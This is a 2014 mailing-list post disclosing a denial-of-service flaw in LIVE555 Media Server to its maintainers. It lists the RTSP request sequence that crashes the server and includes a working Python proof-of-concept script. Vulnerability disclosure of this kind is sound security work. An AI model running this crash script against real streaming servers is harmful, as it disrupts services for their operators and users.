[Live-devel] DoS in Media Server

Wed Jul 16 01:11:35 PDT 2014

Ok, here are the details: DESCRIPTION 

An RTSP client can make the LIVE555 Media Server crash by renegociating transport parameters. PRODUCTS IMPACTED 

LIVE555 Media Server ( http://www.live555.com/mediaServer/ ). 

At minimum v0.74 (2011.12.23) to the most recent version to date v0.82 (2014.03.16). TECHNICAL DETAILS 

The following sequence of requests causes the DoS: 

    1. DESCRIBE (optionally) 
    2. SETUP (e.g. audio track) 
    3. SETUP (e.g. video track) 
    4. PLAY 
    5. SETUP (any of the previously opened tracks) 
    6. PLAY 

Adding a PAUSE request between steps 4 and 5 works around the problem. However, RFC 2326 (RTSP) specifies in chapter “A.2 Server State Machine” that a SETUP request can actually be issued in the “Playing” state. 

The following Python script reproduces the vulnerability. 
import socket
import re

host = ("172.17.44.20", 554)
url = "rtsp://172.17.44.20/brasilccmovie.mpg"

def send(msg):
     if (send.session != ''):
         msg += "Session: " + send.session + "\r\n"
     msg += "CSeq: " + str(send.cseq) + "\r\n"
     msg += "\r\n"
     s.send(msg)
     send.cseq += 1
     reply = s.recv(1000)
     match = re.search('Session: ([^\r;]*)', reply, re.DOTALL)
     if (match):
         send.session = match.group(1)

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.settimeout(0.5)
s.connect(host)

send.session = ''
send.cseq = 1

#send("DESCRIBE " + url + " RTSP/1.0\r\nAccept: application/sdp\r\n")
send("SETUP " + url + "/track1 RTSP/1.0\r\nTransport: RTP/AVP/UDP;unicast;client_port=34000-34001\r\n")
send("SETUP " + url + "/track2 RTSP/1.0\r\nTransport: RTP/AVP/UDP;unicast;client_port=34002-34003\r\n")
send("PLAY " + url + " RTSP/1.0\r\n")
#send("PAUSE " + url + " RTSP/1.0\r\n")
send("SETUP " + url + "/track1 RTSP/1.0\r\nTransport: RTP/AVP/UDP;unicast;client_port=35000-35001\r\n")
send("PLAY " + url + " RTSP/1.0\r\n")

s.close() 

De: “Ross Finlayson” finlayson at live555.com 
À: “LIVE555 Streaming Media - development & use” live-devel at ns.live555.com 
Envoyé: Mardi 15 Juillet 2014 19:58:34 
Objet: Re: [Live-devel] DoS in Media Server 

Please post the details here. If the issue is significant, then we’ll update the code, and people will be encouraged to upgrade. 

Ross Finlayson 
Live Networks, Inc. 
http://www.live555.com/ 

live-devel mailing list 
live-devel at lists.live555.com 
http://lists.live555.com/mailman/listinfo/live-devel 

-- 

Yann Fleutot 
Stormshield Network Security developer 
	Arkoon Netasq 
49 rue Billancourt - FR 92100 Boulogne-Billancourt 

Twitter - LinkedIn - www.stormshield.eu 

-------------- next part --------------
An HTML attachment was scrubbed...
URL: <http://lists.live555.com/pipermail/live-devel/attachments/20140716/54fbf2f1/attachment-0001.html>
-------------- next part --------------
A non-text attachment was scrubbed...
Name: image001.png
Type: image/png
Size: 7129 bytes
Desc: not available
URL: <http://lists.live555.com/pipermail/live-devel/attachments/20140716/54fbf2f1/attachment-0001.png>